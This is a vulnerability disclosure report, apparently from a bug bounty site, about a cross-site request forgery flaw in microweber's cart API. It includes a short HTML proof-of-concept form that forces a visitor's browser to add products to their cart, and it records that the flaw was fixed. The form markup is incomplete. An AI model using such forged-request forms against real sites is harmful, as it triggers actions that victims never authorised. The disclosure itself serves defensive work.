Cross-Site Request Forgery (CSRF) in microweber/microweber


Reported on

Jul 20th 2021

✍️ Description

microweber is vulnerable to Cross-site request forgery. The app is not checking the CSRF token when adding new products to the cart.

🕵️‍♂️ Proof of Concept

HTML content:

<form id="form" action="http://localhost/api/update_cart" method="POST" >
  <input type="text" name="for" value="content">
  <input type="text" name="for_id" value="1">
  <input type="text" name="price" value="100">
  <input type="submit"> 

  setTimeout(() => {
  }, 2000);
  1. Save the above content into an HTML file.
  2. Open the file on the browser and check the cart.

PoC video.

💥 Impact

When a victim access a malicious page, it is possible to add products to the victim's cart.

We have contacted a member of the microweber team and are waiting to hear back a year ago
Peter Ivanov marked this as fixed with commit 781811 a year ago
Peter Ivanov has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation